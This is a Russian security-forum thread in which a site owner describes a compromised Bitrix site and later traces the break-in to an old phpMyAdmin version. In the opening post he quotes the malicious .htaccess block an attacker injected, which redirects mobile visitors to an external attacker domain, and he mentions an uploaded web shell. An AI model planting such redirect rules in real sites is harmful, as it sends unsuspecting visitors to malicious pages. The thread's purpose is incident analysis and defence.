The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка  RSS
"Взломали сайт, изменили .htaccess. Помогите найти дыру"
Вариант для распечатки  
Пред. тема | След. тема 
Форум Информационная безопасность (Обнаружение и предотвращение атак / FreeBSD)
Изначальное сообщение [ Отслеживать ]

"Взломали сайт, изменили .htaccess. Помогите найти дыру"  +/
Сообщение от Nas_tradamus (ok) on 15-Ноя-11, 13:55 
Коллеги, может кто сталкивался. Я что-то гуглом не могу найти через что меня хакнули.

Обнаружил, что у меня модифицировали .htaccess : сделали редирект со всяких мобильных клиентов на сайт http://updateportalos.ru/?a=v294p274z4y2x4u2w4v2t2t2y3s2x454...

Дату создания файла сделали старой.

Залили шелл в корень xtra.php (тоже имеет дату создания раньше, чем его залили).

На сайте у меня битрикс древней версии. Есть подозрения, что атака шла только на битриксы, учитывая как был модифицирован .htaccess

Вот куски .htaccess:

"
# Rules for bitrix:
  RewriteBase /
  RewriteRule ^info/(.*) /information/$1 [L,R=301]
  RewriteCond %{REQUEST_URI} !^/server-status
  RewriteCond %{REQUEST_FILENAME} !-f
  RewriteCond %{REQUEST_FILENAME} !-l
  RewriteCond %{REQUEST_FILENAME} !-d
  RewriteCond %{REQUEST_FILENAME} !/bitrix/urlrewrite.php$
  RewriteRule ^(.*)$ /bitrix/urlrewrite.php [L]

# Вот тут начинается вредоносная вставка:
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} acs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alav [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alca [NC,OR]
RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} audi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} aste [NC,OR]
....
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
....
RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]
RewriteCond %{HTTP_USER_AGENT} !bsd [NC]
RewriteCond %{HTTP_USER_AGENT} !x11 [NC]
RewriteCond %{HTTP_USER_AGENT} !unix [NC]
...
RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ http://updateportalos.ru/?a=v294p274z4y2x4u2w4v2t2t2y3s2x454... [L,R=302]
# сам редирект
"

Интересно, куда копать?
Битрикс пока не могу обновить.

Буду очень благодарен за советы!

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


1. "Взломали сайт, изменили .htaccess. Помогите найти дыру"  +/
Сообщение от Аноним (??) on 15-Ноя-11, 14:25 
> Битрикс пока не могу обновить.

Вы, пардон, хотите и выгоду поиметь и рыбку съесть. Может все-таки обновить?

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

2. "Взломали сайт, изменили .htaccess. Помогите найти дыру"  +/
Сообщение от Nas_tradamus (ok) on 15-Ноя-11, 14:31 
>> Битрикс пока не могу обновить.
> Вы, пардон, хотите и выгоду поиметь и рыбку съесть. Может все-таки обновить?

Да стоит, конечно. Но все программеры сейчас в отпуске. А там чтобы обновить, надо перенести весь код, который модифицировал ядро битрикса, в другое место.
Там дел на месяц для троих программеров чтобы подготовить битрикс к апдейту и протестировать это безобразие. Я понимаю, что последуют комменты вроде "руки за такое надо отрывать" и тому подобное - но это не я виноват что так вышло. :)

Короче, сейчас пытаюсь найти конкретную уязвимость в движке и не получается.

Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

3. "Взломали сайт, изменили .htaccess. Помогите найти дыру"  +/
Сообщение от Nas_tradamus (ok) on 15-Ноя-11, 18:39 
Проблему решил. Ломали через phpmyadmin 3.3.5
Урок мне на будущее.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

4. "Взломали сайт, изменили .htaccess. Помогите найти дыру"  +/
Сообщение от Александр email(??) on 19-Апр-12, 03:18 
> Проблему решил. Ломали через phpmyadmin 3.3.5
> Урок мне на будущее.

Расскажи плиз как защитился? Если ломали через phpmyadmin как это выяснил?

Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

5. "Взломали сайт, изменили .htaccess. Помогите найти дыру"  +/
Сообщение от Nas_tradamus (ok) on 19-Апр-12, 09:19 
>> Проблему решил. Ломали через phpmyadmin 3.3.5
>> Урок мне на будущее.
> Расскажи плиз как защитился? Если ломали через phpmyadmin как это выяснил?

Анализировал логи Апаче: увидел с каких ip запускался этот скрипт, парсил логи по этому ip, а потом увидел поток запросов к phpmyadmin, явно сгенерированный скриптом. Вроде так было дело. Ну еще глянул эксплоиты для phpmyadmin и понял, что моя версия давно уязвима.

Теперь я все phpmyadmin закрываю паролем через .htaccess .

Ответить | Правка | ^ к родителю #4 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру